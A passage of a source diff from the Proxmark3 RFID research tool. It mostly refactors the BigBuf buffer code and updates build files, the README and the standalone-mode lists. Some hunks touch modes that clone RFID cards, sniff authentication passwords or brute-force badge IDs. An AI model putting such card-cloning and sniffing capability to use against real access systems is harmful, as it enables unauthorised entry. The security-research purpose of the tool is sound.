 #	@echo "Files with printf \\\\t:"
 #	@find . \( -name "*.[ch]" -or \( -name "*.cpp" -and -not -name "*.moc.cpp" \) -or -name "*.lua" -or -name "*.py" -or -name "*.pl" -or -name "*.md" -or -name "*.txt" -or -name "*.awk" -or -name "*.v" \) \
@@ -364,10 +372,12 @@ release:
 	@echo "# - Release Tag:  $(VERSION)"
 	@echo "# - Release Name: $(RELEASE_NAME)"
 	# - Removing -Werror...
-	@find . \( -path "./Makefile.defs" -or -path "./client/Makefile" -or -path "./common_arm/Makefile.common" -or -path "./tools/hitag2crack/*/Makefile" \) -exec sed -i 's/ -Werror//' {} \;
-	@find . \( -path "./client/deps/*.cmake" -or -path "./client/CMakeLists.txt" \) -exec sed -i 's/ -Werror//' {} \;
+	@find . \( -path "./Makefile.defs" -or -path "./client/Makefile" -or -path "./common_arm/Makefile.common" -or -path "./tools/hitag2crack/*/Makefile" -or -path "./client/deps/*/Makefile" \) -exec sed -i 's/ -Werror//' {} \;
+	@find . \( -path "./client/deps/*.cmake" -or -path "./client/CMakeLists.txt" -or -path "./client/experimental_lib/CMakeLists.txt" \) -exec sed -i 's/ -Werror//' {} \;
 	# - Changing banner...
+	@sed -i "s/^#define BANNERMSG2 .*/#define BANNERMSG2 \"  -----------------------------------\"/" client/src/proxmark3.c
 	@sed -i "s/^#define BANNERMSG3 .*/#define BANNERMSG3 \"Release $(VERSION) - $(RELEASE_NAME)\"/" client/src/proxmark3.c
+	@echo -n "#   ";grep "^#define BANNERMSG2" client/src/proxmark3.c
 	@echo -n "#   ";grep "^#define BANNERMSG3" client/src/proxmark3.c
 	# - Committing temporarily...
 	@git commit -a -m "Release $(VERSION) - $(RELEASE_NAME)"

Makefile.defs

@@ -53,7 +53,7 @@ USERMOD = usermod -aG
 ADDUSER = adduser
 GETENT_BL = getent group bluetooth
 
-
+PYTHON3_PKGCONFIG ?=   python3
 
 PATHSEP=/
 PREFIX ?=              /usr/local
@@ -112,8 +112,8 @@ ifeq ($(DEBUG),1)
   DEFCFLAGS = -g -O0 -fstrict-aliasing -pipe
   DEFLDFLAGS =
 else
-  DEFCXXFLAGS = -Wall -O3 -pipe
-  DEFCFLAGS = -Wall -O3 -fstrict-aliasing -pipe
+  DEFCXXFLAGS = -Wall -Werror -O3 -pipe
+  DEFCFLAGS = -Wall -Werror -O3 -fstrict-aliasing -pipe
   DEFLDFLAGS =
 endif
 

Makefile.platform.sample

@@ -1,19 +1,39 @@
 # If you want to use it, copy this file as Makefile.platform and adjust it to your needs
 # Run 'make PLATFORM=' to get an exhaustive list of possible parameters for this file.
 
+# By default PM3 RDV4 image is generated.
+# Comment the line below and uncomment further down according to which device you have
 PLATFORM=PM3RDV4
+
+# For PM3 RDV1, RDV2, Easy or rysccorps etc
+# uncomment the line below
 #PLATFORM=PM3GENERIC
+
+# For ICOPY-X and PM3 Max:
+# uncomment the two lines below
+#PLATFORM=PM3ICOPYX
+#PLATFORM_EXTRAS=FLASH
+
+# For PM3 Ultimate:
+# uncomment the line below
+#PLATFORM=PM3ULTIMATE
+
 # If you want more than one PLATFORM_EXTRAS option, separate them by spaces:
 #PLATFORM_EXTRAS=BTADDON
 #PLATFORM_EXTRAS=FLASH
 #PLATFORM_EXTRAS=SMARTCARD
-#PLATFORM_EXTRAS=BTADDON FLASH
-#STANDALONE=LF_SAMYRUN
+#PLATFORM_EXTRAS=BTADDON FPC_USART_DEV FLASH
+#STANDALONE=HF_UNISNIFF
+
 
 # Uncomment the line below to set the correct LED order on board Proxmark3 Easy
 # Only available with PLATFORM=PM3GENERIC
 #LED_ORDER=PM3EASY
 
+# Uncomment a line below to change default USART baud rate
+# defaults to 115200 used by HC-05 in Blueshark
+#USART_BAUD_RATE=19200
+
 # Uncomment the lines below in order to make a 256KB image
 # and comment out the lines above
 

README.md

@@ -60,7 +60,8 @@ The Proxmark3 is the swiss-army tool of RFID, allowing for interactions with the
 |[Developing standalone mode](/armsrc/Standalone/readme.md)|[Wiki about standalone mode](https://github.com/RfidResearchGroup/proxmark3/wiki/Standalone-mode)|[Notes on Magic UID cards](/doc/magic_cards_notes.md)|
 |[Notes on Color usage](/doc/colors_notes.md)|[Makefile vs CMake](/doc/md/Development/Makefile-vs-CMake.md)|[Notes on Cloner guns](/doc/cloner_notes.md)|
 |[Notes on cliparser usage](/doc/cliparser.md)|[Notes on clocks](/doc/clocks.md)|[Notes on MIFARE DESFire](/doc/desfire.md)|
-|[Notes on CIPURSE](/doc/cipurse.md)|[Notes on NDEF type4a](/doc/ndef_type4a.md)|[Notes on downgrade attacks](/doc/hid_downgrade.md)|
+|[Notes on CIPURSE](/doc/cipurse.md)|[Notes on NDEF type4a](/doc/ndef_type4a.md)|[Unofficial MIFARE DESFire bible](/doc/unofficial_desfire_bible.md)|
+[Notes on downgrade attacks](/doc/hid_downgrade.md)|||
 
 # How to build?
 
@@ -96,12 +97,14 @@ We define generic Proxmark3 platforms as following devices.
    - **Note**: currently incompatible with iCopy-X GUI as Proxmark client commands using different syntax
    - **Note**: see also [icopyx-community repos](https://github.com/iCopy-X-Community/) for upstream sources, reversed hw etc.
    - **Note**: Uses DRM to lock down tags, ignores the open source licences. Use on your own risk. 
+-  ⚠ Proxmark3 Ultimate
+   - **Note**: unknown device hw
+   - **Note**: FPGA images is building for it.  Use on your own risk.
 
 **Unknown support status**
  - ⚠  VX
    - **Note**: unknown device hw
--  ⚠ Proxmark3 Ultimate
-   - **Note**: unknown device hw
+
 
 When it comes to these new unknown models we are depending on the community to report in if this repo works and what they did to make it work.
 
@@ -180,10 +183,11 @@ We usually merge your contributions fast since we do like the idea of getting a
 The [public roadmap](https://github.com/RfidResearchGroup/proxmark3/wiki/Public-Roadmap) is an excellent start to read if you are interesting in contributing.
 
 
-## Supported operative systems 
+## Supported operating systems 
 
 This repo compiles nicely on 
    - WSL1 on Windows 10
+   - WSL2 on Windows 10/11
    - Proxspace environment [release v3.xx](https://github.com/Gator96100/ProxSpace/releases)
    - Windows/MinGW environment
    - Ubuntu, ParrotOS, Gentoo, Pentoo, Kali, NetHunter, Arch Linux, Fedora, Debian, Raspbian

armsrc/BigBuf.c

@@ -30,7 +30,7 @@ extern uint32_t _stack_start[], __bss_end__[];
 // BigBuf is the large multi-purpose buffer, typically used to hold A/D samples or traces.
 // Also used to hold various smaller buffers and the Mifare Emulator Memory.
 // We know that bss is aligned to 4 bytes.
-static uint8_t *BigBuf = (uint8_t *)__bss_end__;
+static uint8_t *const BigBuf = (uint8_t *)__bss_end__;
 
 /* BigBuf memory layout:
 Pointer to highest available memory: s_bigbuf_hi
@@ -45,7 +45,7 @@ static uint32_t s_bigbuf_size = 0;
 static uint32_t s_bigbuf_hi = 0;
 
 // pointer to the emulator memory.
-static uint8_t *emulator_memory = NULL;
+static uint8_t *s_emulator_memory = NULL;
 
 //=============================================================================
 // The ToSend buffer.
@@ -53,7 +53,7 @@ static uint8_t *emulator_memory = NULL;
 // any purpose (fake tag, as reader, whatever). We go MSB first, since that
 // is the order in which they go out on the wire.
 //=============================================================================
-static tosend_t toSend = {
+static tosend_t s_toSend = {
     .max = -1,
     .bit = 8,
     .buf = NULL
@@ -62,25 +62,25 @@ static tosend_t toSend = {
 // The dmaBuf 16bit buffer.
 // A buffer where we receive IQ samples sent from the FPGA, for demodulating
 //=============================================================================
-static dmabuf16_t dma_16 = {
+static dmabuf16_t s_dma_16 = {
     .size = DMA_BUFFER_SIZE,
     .buf = NULL
 };
 // dmaBuf 8bit buffer
-static dmabuf8_t dma_8 = {
+static dmabuf8_t s_dma_8 = {
     .size = DMA_BUFFER_SIZE,
     .buf = NULL
 };
 
 // trace related variables
-static uint32_t trace_len = 0;
-static bool tracing = true;
+static uint32_t s_trace_len = 0;
+static bool s_tracing = true;
 
 // compute the available size for BigBuf
 void BigBuf_initialize(void) {
     s_bigbuf_size = (uint32_t)_stack_start - (uint32_t)__bss_end__;
     s_bigbuf_hi = s_bigbuf_size;
-    trace_len = 0;
+    s_trace_len = 0;
 }
 
 // get the address of BigBuf
@@ -95,10 +95,10 @@ uint32_t BigBuf_get_size(void) {
 // get the address of the emulator memory. Allocate part of Bigbuf for it, if not yet done
 uint8_t *BigBuf_get_EM_addr(void) {
     // not yet allocated
-    if (emulator_memory == NULL) {
-        emulator_memory = BigBuf_calloc(CARD_MEMORY_SIZE);
+    if (s_emulator_memory == NULL) {
+        s_emulator_memory = BigBuf_calloc(CARD_MEMORY_SIZE);
     }
-    return emulator_memory;
+    return s_emulator_memory;
 }
 
 uint32_t BigBuf_get_hi(void) {
@@ -121,7 +121,7 @@ void BigBuf_Clear_ext(bool verbose) {
     memset(BigBuf, 0, s_bigbuf_size);
     clear_trace();
     if (verbose) {
-        Dbprintf("Buffer cleared (%i bytes)", s_bigbuf_size);
+        if (g_dbglevel >= DBG_ERROR) Dbprintf("Buffer cleared (%i bytes)", s_bigbuf_size);
     }
 }
 
@@ -138,8 +138,9 @@ void BigBuf_Clear_keep_EM(void) {
 uint8_t *BigBuf_malloc(uint16_t chunksize) {
     chunksize = (chunksize + BIGBUF_ALIGN_BYTES - 1) & BIGBUF_ALIGN_MASK; // round up to next multiple of 4
 
-    if (s_bigbuf_hi < chunksize) {
-        return NULL; // no memory left
+    if (s_bigbuf_hi - s_trace_len < chunksize || chunksize == 0) {
+        // no memory left or chunksize too large
+        return NULL;
     }
 
     s_bigbuf_hi -= chunksize;  // aligned to 4 Byte boundary
@@ -159,23 +160,23 @@ uint8_t *BigBuf_calloc(uint16_t chunksize) {
 // free ALL allocated chunks. The whole BigBuf is available for traces or samples again.
 void BigBuf_free(void) {
     s_bigbuf_hi = s_bigbuf_size;
-    emulator_memory = NULL;
+    s_emulator_memory = NULL;
     // shouldn't this empty BigBuf also?
-    toSend.buf = NULL;
-    dma_16.buf = NULL;
-    dma_8.buf = NULL;
+    s_toSend.buf = NULL;
+    s_dma_16.buf = NULL;
+    s_dma_8.buf = NULL;
 }
 
 // free allocated chunks EXCEPT the emulator memory
 void BigBuf_free_keep_EM(void) {
-    if (emulator_memory != NULL)
-        s_bigbuf_hi = emulator_memory - (uint8_t *)BigBuf;
+    if (s_emulator_memory != NULL)
+        s_bigbuf_hi = s_emulator_memory - (uint8_t *)BigBuf;
     else
         s_bigbuf_hi = s_bigbuf_size;
 
-    toSend.buf = NULL;
-    dma_16.buf = NULL;
-    dma_8.buf = NULL;
+    s_toSend.buf = NULL;
+    s_dma_16.buf = NULL;
+    s_dma_8.buf = NULL;
 }
 
 void BigBuf_print_status(void) {
@@ -183,23 +184,23 @@ void BigBuf_print_status(void) {
     Dbprintf("  BigBuf_size............. %d", s_bigbuf_size);
     Dbprintf("  Available memory........ %d", s_bigbuf_hi);
     DbpString(_CYAN_("Tracing"));
-    Dbprintf("  tracing ................ %d", tracing);
-    Dbprintf("  traceLen ............... %d", trace_len);
+    Dbprintf("  tracing ................ %d", s_tracing);
+    Dbprintf("  traceLen ............... %d", s_trace_len);
 
     if (g_dbglevel >= DBG_DEBUG) {
         DbpString(_CYAN_("Sending buffers"));
 
         uint16_t d8 = 0;
-        if (dma_8.buf)
-            d8 = dma_8.buf - BigBuf_get_addr();
+        if (s_dma_8.buf)
+            d8 = s_dma_8.buf - BigBuf_get_addr();
 
         uint16_t d16 = 0;
-        if (dma_16.buf)
-            d16 = (uint8_t *)dma_16.buf - BigBuf_get_addr();
+        if (s_dma_16.buf)
+            d16 = (uint8_t *)s_dma_16.buf - BigBuf_get_addr();
 
         uint16_t ts = 0;
-        if (toSend.buf)
-            ts = toSend.buf - BigBuf_get_addr();
+        if (s_toSend.buf)
+            ts = s_toSend.buf - BigBuf_get_addr();
 
         Dbprintf("  dma8 memory............. %u", d8);
         Dbprintf("  dma16 memory............ %u", d16);
@@ -213,19 +214,19 @@ uint16_t BigBuf_max_traceLen(void) {
 }
 
 void clear_trace(void) {
-    trace_len = 0;
+    s_trace_len = 0;
 }
 
 void set_tracelen(uint32_t value) {
-    trace_len = value;
+    s_trace_len = value;
 }
 
 void set_tracing(bool enable) {
-    tracing = enable;
+    s_tracing = enable;
 }
 
 bool get_tracing(void) {
-    return tracing;
+    return s_tracing;
 }
 
 /**
@@ -233,7 +234,7 @@ bool get_tracing(void) {
  * @return
  */
 uint32_t BigBuf_get_traceLen(void) {
-    return trace_len;
+    return s_trace_len;
 }
 
 /**
@@ -243,18 +244,23 @@ uint32_t BigBuf_get_traceLen(void) {
   annotation of commands/responses.
 **/
 bool RAMFUNC LogTrace(const uint8_t *btBytes, uint16_t iLen, uint32_t timestamp_start, uint32_t timestamp_end, const uint8_t *parity, bool reader2tag) {
-    if (tracing == false) {
+    if (btBytes == NULL || s_tracing == false) {
         return false;
     }
 
-    uint8_t *trace = BigBuf_get_addr();
-    tracelog_hdr_t *hdr = (tracelog_hdr_t *)(trace + trace_len);
+    // Ignore too-small or too-large logs
+    if (iLen == 0 || iLen >= (1 << 15)) {
+        return false;
+    }
 
-    uint16_t num_paritybytes = (iLen - 1) / 8 + 1; // number of valid paritybytes in *parity
+    // number of valid paritybytes in *parity
+    const uint16_t num_paritybytes = (iLen - 1) / 8 + 1;
 
-    // Return when trace is full
-    if (TRACELOG_HDR_LEN + iLen + num_paritybytes >= BigBuf_max_traceLen() - trace_len) {
-        tracing = false;
+    // Disable tracing and return when trace is full
+    const uint32_t max_trace_len = BigBuf_max_traceLen();
+    const uint32_t trace_entry_len = TRACELOG_HDR_LEN + iLen + num_paritybytes;
+    if (s_trace_len >= max_trace_len || trace_entry_len >= max_trace_len - s_trace_len) {
+        s_tracing = false;
         return false;
     }
 
@@ -274,27 +280,19 @@ bool RAMFUNC LogTrace(const uint8_t *btBytes, uint16_t iLen, uint32_t timestamp_
         duration = 0xFFFF;
     }
 
+    tracelog_hdr_t *hdr = (tracelog_hdr_t *)(BigBuf_get_addr() + s_trace_len);
     hdr->timestamp = timestamp_start;
     hdr->duration = duration & 0xFFFF;
     hdr->data_len = iLen;
     hdr->isResponse = !reader2tag;
-    trace_len += TRACELOG_HDR_LEN;
-
-    // data bytes
-    if (btBytes != NULL && iLen != 0) {
-        memcpy(hdr->frame, btBytes, iLen);
-        trace_len += iLen;
+    memcpy(hdr->frame, btBytes, iLen);
+    if (parity != NULL) {
+        memcpy(&hdr->frame[iLen], parity, num_paritybytes);
+    } else {
+        memset(&hdr->frame[iLen], 0x00, num_paritybytes);
     }
 
-    // parity bytes
-    if (num_paritybytes != 0) {
-        if (parity != NULL) {
-            memcpy(trace + trace_len, parity, num_paritybytes);
-        } else {
-            memset(trace + trace_len, 0x00, num_paritybytes);
-        }
-        trace_len += num_paritybytes;
-    }
+    s_trace_len += trace_entry_len;
     return true;
 }
 
@@ -323,6 +321,10 @@ bool RAMFUNC LogTraceBits(const uint8_t *btBytes, uint16_t bitLen, uint32_t time
 // Emulator memory
 int emlSet(const uint8_t *data, uint32_t offset, uint32_t length) {
     uint8_t *mem = BigBuf_get_EM_addr();
+    if (mem == NULL) {
+        return PM3_EMALLOC;
+    }
+
     if (offset + length <= CARD_MEMORY_SIZE) {
         memcpy(mem + offset, data, length);
         return PM3_SUCCESS;
@@ -334,6 +336,10 @@ int emlSet(const uint8_t *data, uint32_t offset, uint32_t length) {
 
 int emlGet(uint8_t *out, uint32_t offset, uint32_t length) {
     uint8_t *mem = BigBuf_get_EM_addr();
+    if (mem == NULL) {
+        return PM3_EMALLOC;
+    }
+
     if (offset + length <= CARD_MEMORY_SIZE) {
         memcpy(out, mem + offset, length);
         return PM3_SUCCESS;
@@ -347,51 +353,51 @@ int emlGet(uint8_t *out, uint32_t offset, uint32_t length) {
 // get the address of the ToSend buffer. Allocate part of Bigbuf for it, if not yet done
 tosend_t *get_tosend(void) {
 
-    if (toSend.buf == NULL) {
-        toSend.buf = BigBuf_malloc(TOSEND_BUFFER_SIZE);
+    if (s_toSend.buf == NULL) {
+        s_toSend.buf = BigBuf_calloc(TOSEND_BUFFER_SIZE);
     }
-    return &toSend;
+    return &s_toSend;
 }
 
 void tosend_reset(void) {
-    toSend.max = -1;
-    toSend.bit = 8;
+    s_toSend.max = -1;
+    s_toSend.bit = 8;
 }
 
 void tosend_stuffbit(int b) {
 
-    if (toSend.max >= TOSEND_BUFFER_SIZE - 1) {
-        Dbprintf(_RED_("toSend overflow"));
+    if (s_toSend.max >= TOSEND_BUFFER_SIZE - 1) {
+        Dbprintf(_RED_("s_toSend overflow"));
         return;
     }
 
-    if (toSend.bit >= 8) {
-        toSend.max++;
-        toSend.buf[toSend.max] = 0;
-        toSend.bit = 0;
+    if (s_toSend.bit >= 8) {
+        s_toSend.max++;
+        s_toSend.buf[s_toSend.max] = 0;
+        s_toSend.bit = 0;
     }
 
-    if (b)
-        toSend.buf[toSend.max] |= (1 << (7 - toSend.bit));
+    if (b) {
+        s_toSend.buf[s_toSend.max] |= (1 << (7 - s_toSend.bit));
+    }
 
-    toSend.bit++;
+    s_toSend.bit++;
 
-    if (toSend.max >= TOSEND_BUFFER_SIZE) {
-        toSend.bit = 0;
+    if (s_toSend.max >= TOSEND_BUFFER_SIZE) {
+        s_toSend.bit = 0;
     }
 }
 
 dmabuf16_t *get_dma16(void) {
-    if (dma_16.buf == NULL) {
-        dma_16.buf = (uint16_t *)BigBuf_malloc(DMA_BUFFER_SIZE * sizeof(uint16_t));
+    if (s_dma_16.buf == NULL) {
+        s_dma_16.buf = (uint16_t *)BigBuf_calloc(DMA_BUFFER_SIZE * sizeof(uint16_t));
     }
-
-    return &dma_16;
+    return &s_dma_16;
 }
 
 dmabuf8_t *get_dma8(void) {
-    if (dma_8.buf == NULL)
-        dma_8.buf = BigBuf_malloc(DMA_BUFFER_SIZE);
-
-    return &dma_8;
+    if (s_dma_8.buf == NULL) {
+        s_dma_8.buf = BigBuf_calloc(DMA_BUFFER_SIZE);
+    }
+    return &s_dma_8;
 }

armsrc/BigBuf.h

@@ -23,9 +23,13 @@
 
 #define MAX_FRAME_SIZE          256 // maximum allowed ISO14443 frame
 #define MAX_PARITY_SIZE         ((MAX_FRAME_SIZE + 7) / 8)
-#define MAX_MIFARE_FRAME_SIZE   18  // biggest Mifare frame is answer to a read (one block = 16 Bytes) + 2 Bytes CRC
-#define MAX_MIFARE_PARITY_SIZE  3   // need 18 parity bits for the 18 Byte above. 3 Bytes are enough to store these
+#define MAX_MIFARE_FRAME_SIZE   19  // biggest Mifare frame is UL AES answer to AUTH (1 + 16 Bytes) + 2 Bytes CRC
+#define MAX_MIFARE_PARITY_SIZE  3   // need 19 parity bits for the 19 Byte above. 3 Bytes are enough to store these
 #define CARD_MEMORY_SIZE        4096
+// For now we're storing FM11RF08S nonces in the upper 1k of CARD_MEMORY_SIZE
+// but we might have to allocate extra space if one day we've to support sth like a FM11RF32S
+#define CARD_MEMORY_RF08S_OFFSET 1024
+
 //#define DMA_BUFFER_SIZE         (512 + 256)
 #define DMA_BUFFER_SIZE         512
 

armsrc/Makefile

@@ -37,7 +37,8 @@ APP_CFLAGS = $(PLATFORM_DEFS) \
 SRC_LF = lfops.c lfsampling.c pcf7931.c lfdemod.c lfadc.c
 SRC_HF = hfops.c
 SRC_ISO15693 = iso15693.c iso15693tools.c
-SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c epa.c mifaresim.c sam_mfc.c sam_seos.c
+SRC_ISO14443a = iso14443a.c mifareutil.c mifarecmd.c epa.c mifaresim.c sam_common.c sam_mfc.c sam_seos.c
+
 #UNUSED: mifaresniff.c
 SRC_ISO14443b = iso14443b.c
 SRC_FELICA = felica.c
@@ -59,7 +60,7 @@ else
 endif
 
 ifneq (,$(findstring WITH_SMARTCARD,$(APP_CFLAGS)))
-    SRC_SMARTCARD = i2c.c
+    SRC_SMARTCARD = i2c.c i2c_direct.c emvsim.c
 else
     SRC_SMARTCARD =
 endif
@@ -71,7 +72,7 @@ else
 endif
 
 ifneq (,$(findstring WITH_HITAG,$(APP_CFLAGS)))
-    SRC_HITAG = hitag2_crypto.c hitag2.c hitagS.c hitag2_crack.c
+    SRC_HITAG = hitag2_crypto.c hitag_common.c hitag2.c hitagS.c hitagu.c hitag2_crack.c
     APP_CFLAGS += -I../common/hitag2
 else
     SRC_HITAG =
@@ -185,7 +186,7 @@ showinfo:
 # version_pm3.c should be checked on every time fullimage.stage1.elf should be remade
 version_pm3.c: default_version_pm3.c $(OBJDIR)/fpga_version_info.o $(OBJDIR)/fpga_all.o $(THUMBOBJ) $(ARMOBJ) .FORCE
 	$(info [-] CHECK $@)
-	$(Q)$(CP) $< $@
+	$(Q)$(SH) ../tools/mkversion.sh $@ || $(CP) $< $@
 
 fpga_version_info.c: $(FPGA_BITSTREAMS) $(FPGA_COMPRESSOR)
 	$(info [-] GEN $@)

armsrc/Standalone/Makefile.hal

@@ -119,6 +119,9 @@ define KNOWN_STANDALONE_DEFINITIONS
 | HF_REBLAY       | 14A Relay over BT                      |
 | (RDV4 only)     |  - Salvador Mendoza                    |
 +----------------------------------------------------------+
+| HF_ST25_TEAROFF | Store/restore ST25TB tags with         |
+|                 | tear-off for counters - SecLabz        |
++----------------------------------------------------------+
 | HF_TCPRST       | IKEA Rothult read/sim/dump/emul        |
 |                 | - Nick Draffen                         |
 +----------------------------------------------------------+
@@ -139,11 +142,11 @@ endef
 
 STANDALONE_MODES := LF_SKELETON
 STANDALONE_MODES += LF_EM4100EMUL LF_EM4100RSWB LF_EM4100RSWW LF_EM4100RWC LF_HIDBRUTE LF_HIDFCBRUTE LF_ICEHID LF_MULTIHID LF_NEDAP_SIM LF_NEXID LF_PROXBRUTE LF_PROX2BRUTE LF_SAMYRUN LF_THAREXDE
-STANDALONE_MODES += HF_14ASNIFF HF_14BSNIFF HF_15SNIFF HF_15SIM HF_AVEFUL HF_BOG HF_CARDHOPPER HF_COLIN HF_CRAFTBYTE HF_ICECLASS HF_LEGIC HF_LEGICSIM HF_MATTYRUN HF_MFCSIM HF_MSDSAL HF_REBLAY HF_TCPRST HF_TMUDFORD HF_UNISNIFF HF_YOUNG
+STANDALONE_MODES += HF_14ASNIFF HF_14BSNIFF HF_15SNIFF HF_15SIM HF_AVEFUL HF_BOG HF_CARDHOPPER HF_COLIN HF_CRAFTBYTE HF_ICECLASS HF_LEGIC HF_LEGICSIM HF_MATTYRUN HF_MFCSIM HF_MSDSAL HF_REBLAY HF_ST25_TEAROFF HF_TCPRST HF_TMUDFORD HF_UNISNIFF HF_YOUNG
 STANDALONE_MODES += DANKARMULTI
 STANDALONE_MODES_REQ_BT := HF_CARDHOPPER HF_REBLAY
 STANDALONE_MODES_REQ_SMARTCARD :=
-STANDALONE_MODES_REQ_FLASH := LF_HIDFCBRUTE LF_ICEHID LF_NEXID LF_THAREXDE HF_BOG HF_COLIN HF_ICECLASS HF_LEGICSIM HF_MFCSIM
+STANDALONE_MODES_REQ_FLASH := LF_HIDFCBRUTE LF_ICEHID LF_NEXID LF_THAREXDE HF_BOG HF_COLIN HF_ICECLASS HF_LEGICSIM HF_MFCSIM HF_ST25_TEAROFF
 ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES)),)
     STANDALONE_PLATFORM_DEFS += -DWITH_STANDALONE_$(STANDALONE)
     ifneq ($(filter $(STANDALONE),$(STANDALONE_MODES_REQ_SMARTCARD)),)

armsrc/Standalone/Makefile.inc

@@ -157,6 +157,10 @@ endif
 ifneq (,$(findstring WITH_STANDALONE_HF_YOUNG,$(APP_CFLAGS)))
     SRC_STANDALONE = hf_young.c
 endif
+# WITH_STANDALONE_HF_ST25_TEAROFF
+ifneq (,$(findstring WITH_STANDALONE_HF_ST25_TEAROFF,$(APP_CFLAGS)))
+    SRC_STANDALONE = hf_st25_tearoff.c
+endif
 
 ifneq (,$(findstring WITH_STANDALONE_DANKARMULTI,$(APP_CFLAGS)))
     SRC_STANDALONE = dankarmulti.c

armsrc/Standalone/dankarmulti.c

@@ -106,13 +106,11 @@ END_MODE_LIST
  *  End mode list  *
  *******************/
 
-void update_mode(int selected);
-
 void ModInfo(void) {
     DbpString("  Multi standalone loader aka dankarmulti (Daniel Karling)");
 }
 
-void update_mode(int selected) {
+static void update_mode(int selected) {
     if (selected >= NUM_MODES) {
         SpinDown(100);
         Dbprintf("Invalid mode selected");

armsrc/Standalone/hf_15sim.c

@@ -70,7 +70,9 @@ void RunMod(void) {
     FpgaDownloadAndGo(FPGA_BITSTREAM_HF_15);
 
     iso15_tag_t *tag = (iso15_tag_t *) BigBuf_get_EM_addr();
-    if (tag == NULL) return;
+    if (tag == NULL) {
+        return;
+    }
 
     uint8_t cmd[8] = {0};
     int res;

armsrc/Standalone/hf_aveful.c

@@ -67,38 +67,32 @@ typedef struct {
     uint8_t sak;
 } PACKED card_clone_t;
 
-int get_block_count(iso14a_card_select_t card, uint8_t *version, uint16_t version_len);
-uint16_t get_ev1_version(iso14a_card_select_t card, uint8_t *version, uint16_t version_len);
-uint16_t get_ev1_signature(iso14a_card_select_t card, uint8_t *signature, uint16_t sign_len);
-uint16_t get_ev1_counter(iso14a_card_select_t card, uint8_t counter, uint8_t *response, uint16_t resp_len);
-uint16_t get_ev1_tearing(iso14a_card_select_t card, uint8_t counter, uint8_t *response, uint16_t resp_len);
-
-uint16_t get_ev1_version(iso14a_card_select_t card, uint8_t *version, uint16_t version_len) {
+static uint16_t get_ev1_version(iso14a_card_select_t card, uint8_t *version, uint16_t version_len) {
     return mifare_sendcmd(MIFARE_ULEV1_VERSION, NULL, 0, version, version_len, NULL, NULL);
 }
 
-uint16_t get_ev1_signature(iso14a_card_select_t card, uint8_t *signature, uint16_t sign_len) {
+static uint16_t get_ev1_signature(iso14a_card_select_t card, uint8_t *signature, uint16_t sign_len) {
     uint8_t cmd[4] = {MIFARE_ULEV1_READSIG, 0x00, 0x00, 0x00};
     AddCrc14A(cmd, 2);
     ReaderTransmit(cmd, sizeof(cmd), NULL);
     return ReaderReceive(signature, sign_len, NULL);
 }
 
-uint16_t get_ev1_counter(iso14a_card_select_t card, uint8_t counter, uint8_t *response, uint16_t resp_len) {
+static uint16_t get_ev1_counter(iso14a_card_select_t card, uint8_t counter, uint8_t *response, uint16_t resp_len) {
     uint8_t cmd[4] = {MIFARE_ULEV1_READ_CNT, counter, 0x00, 0x00};
     AddCrc14A(cmd, 2);
     ReaderTransmit(cmd, sizeof(cmd), NULL);
     return ReaderReceive(response, resp_len, NULL);
 }
 
-uint16_t get_ev1_tearing(iso14a_card_select_t card, uint8_t counter, uint8_t *response, uint16_t resp_len) {
+static uint16_t get_ev1_tearing(iso14a_card_select_t card, uint8_t counter, uint8_t *response, uint16_t resp_len) {
     uint8_t cmd[4] = {MIFARE_ULEV1_CHECKTEAR, counter, 0x00, 0x00};
     AddCrc14A(cmd, 2);
     ReaderTransmit(cmd, sizeof(cmd), NULL);
     return ReaderReceive(response, resp_len, NULL);
 }
 
-int get_block_count(iso14a_card_select_t card, uint8_t *version, uint16_t version_len) {
+static int get_block_count(iso14a_card_select_t card, const uint8_t *version, uint16_t version_len) {
     // Default to MAX_DEFAULT_BLOCKS blocks
     int block_count = MAX_DEFAULT_BLOCKS;
     // Most of this code is from cmdhfmfu.c
@@ -163,7 +157,7 @@ void RunMod(void) {
             if (button_pressed != BUTTON_NO_CLICK || data_available())
                 break;
             else if (state == STATE_SEARCH) {
-                if (!iso14443a_select_card(NULL, &card, NULL, true, 0, true)) {
+                if (iso14443a_select_card(NULL, &card, NULL, true, 0, true) == 0) {
                     FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
                     LED_D_OFF();
                     SpinDelay(500);
@@ -248,10 +242,11 @@ void RunMod(void) {
                     state = STATE_SEARCH;
                 }
             } else if (state == STATE_EMUL) {
-                uint16_t flags = FLAG_7B_UID_IN_DATA;
+                uint16_t flags = 0;
+                FLAG_SET_UID_IN_DATA(flags, 7);
 
                 Dbprintf("Starting simulation, press " _GREEN_("pm3 button") " to stop and go back to search state.");
-                SimulateIso14443aTag(7, flags, card.uid, 0);
+                SimulateIso14443aTag(7, flags, card.uid, 0, NULL, 0, false, false);
 
                 // Go back to search state if user presses pm3-button
                 state = STATE_SEARCH;

armsrc/Standalone/hf_bog.c

@@ -60,22 +60,21 @@ static void RAMFUNC SniffAndStore(uint8_t param) {
     // free all previous allocations first
     BigBuf_free();
     BigBuf_Clear_ext(false);
-    clear_trace();
     set_tracing(true);
 
     // Array to store the authpwds
-    uint8_t *capturedPwds = BigBuf_malloc(4 * MAX_PWDS_PER_SESSION);
+    uint8_t *capturedPwds = BigBuf_calloc(4 * MAX_PWDS_PER_SESSION);
 
     // The command (reader -> tag) that we're receiving.
-    uint8_t *receivedCmd = BigBuf_malloc(MAX_FRAME_SIZE);
-    uint8_t *receivedCmdPar = BigBuf_malloc(MAX_PARITY_SIZE);
+    uint8_t *receivedCmd = BigBuf_calloc(MAX_FRAME_SIZE);
+    uint8_t *receivedCmdPar = BigBuf_calloc(MAX_PARITY_SIZE);
 
     // The response (tag -> reader) that we're receiving.
-    uint8_t *receivedResp = BigBuf_malloc(MAX_FRAME_SIZE);
-    uint8_t *receivedRespPar = BigBuf_malloc(MAX_PARITY_SIZE);
+    uint8_t *receivedResp = BigBuf_calloc(MAX_FRAME_SIZE);
+    uint8_t *receivedRespPar = BigBuf_calloc(MAX_PARITY_SIZE);
 
     // The DMA buffer, used to stream samples from the FPGA
-    uint8_t *dmaBuf = BigBuf_malloc(DMA_BUFFER_SIZE);
+    uint8_t *dmaBuf = BigBuf_calloc(DMA_BUFFER_SIZE);
     uint8_t *data = dmaBuf;
 
     uint8_t previous_data = 0;
@@ -134,13 +133,13 @@ static void RAMFUNC SniffAndStore(uint8_t param) {
             continue;
 
         // primary buffer was stopped( <-- we lost data!
-        if (!AT91C_BASE_PDC_SSC->PDC_RCR) {
